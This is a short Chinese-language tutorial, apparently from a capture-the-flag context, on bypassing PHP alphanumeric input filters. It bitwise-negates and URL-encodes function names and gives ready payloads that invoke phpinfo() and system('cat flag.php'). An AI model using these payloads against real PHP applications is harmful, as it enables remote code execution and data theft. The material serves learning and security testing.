原理
我们可以对需要使用的函数进行取反绕过,然后再进行URL 编码;
将payload取反获得不可打印字符,即可绕过字母数字检测,但不可打印字符不可以直接传入服务器,需要将其url编码一遍,直接传入可能会在传输或者构造的时候缺失或错乱,导致最后再取反回来错误或乱码
构造payload的时候将取反 ~ 带上一并传入服务器,这样服务器接收后会取反回来,便可还原代码;
利用
注意:在使用取反编码再取反进行绕过时,想要执行我们指定的代码,传入的payload必须要满足 (函数名)() 这样的形式,因为在取反之前PHP解释器并不知道是要执行一个函数,导致取反之后就算是一个函数也不会被当作代码执行
var_dump(urlencode(~'phpinfo'));(~%8F%97%8F%96%91%99%90)();
#phpinfo();
在web端直接传会被前端二次加解码,导致服务器收到的数据错误,因此选择抓包传参发送原始数据
构造system('cat flag.php')
var_dump(urlencode(~'system'));
var_dump(urlencode(~'cat flag.php'));string(18) "%8C%86%8C%8B%9A%92"
string(36) "%9C%9E%8B%DF%99%93%9E%98%D1%8F%97%8F"
# payload
(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%99%93%9E%98%D1%8F%97%8F);